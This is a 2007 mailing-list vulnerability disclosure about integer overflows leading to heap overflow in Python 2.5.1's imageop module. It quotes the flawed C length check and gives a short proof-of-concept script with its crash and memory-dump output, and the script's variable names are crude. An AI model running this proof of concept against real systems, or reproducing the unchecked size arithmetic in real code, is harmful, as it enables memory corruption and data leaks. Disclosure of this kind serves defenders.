Full Disclosure mailing list archives
python <= 2.5.1 standart librairy multiples int overflow, heap overflow in imageop module
From: "Slythers Bro" <slythers () gmail com>
Date: Sun, 16 Sep 2007 01:53:32 +0200
The module imageop contains a lots of int overflow, which result in heap
overflow, and maybe memory dump.
The files imageop.c and rbgimgmodule.c are examples.
static PyObject *
imageop_tovideo(PyObject *self, PyObject *args)
{
int maxx, maxy, x, y, len;
........................
/* *************** int overflow here permit to bypass len check
******************* */
if ( maxx*maxy*width != len ) {
PyErr_SetString(ImageopError, "String has incorrect length");
return 0;
}
rv = PyString_FromStringAndSize(NULL, len);
if ( rv == 0 )
return 0;
ncp = (unsigned char *)PyString_AsString(rv);
if ( width == 1 ) {
memcpy(ncp, cp, maxx); /* Copy first line */
ncp += maxx;
/* ********** with a negativ value it's possible to bypass the code
********** */
for (y=1; y<maxy; y++) { /* Interpolate other lines */
-----------------------------------------------------------------------------------------------------------------------------
an IA 32 bits Proof of Concept:
*****************************************************************
import imageop
sexshit = "a"*1603
evil = "p"*5241
connard = "s"*2000
supaire= "45"*65
print supaire
connard = "cool"
salope = "suceuse"
dtc = imageop.tovideo(sexshit,1,4461,-2147002257)
sexshit = "dtc"*52
print connard,supaire," fin de dump"
**********************************************************************
www@AtlanticDrive:~$ python sux.py
4545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545
cool
4545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545
fin de dump
*** glibc detected *** corrupted double-linked list: 0x0817d3f0 ***
Abandon
www@AtlanticDrive:~$
ok, i hate the python's syntax, that's too old school ! :p
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- python <= 2.5.1 standart librairy multiples int overflow, heap overflow in imageop module Slythers Bro (Sep 15)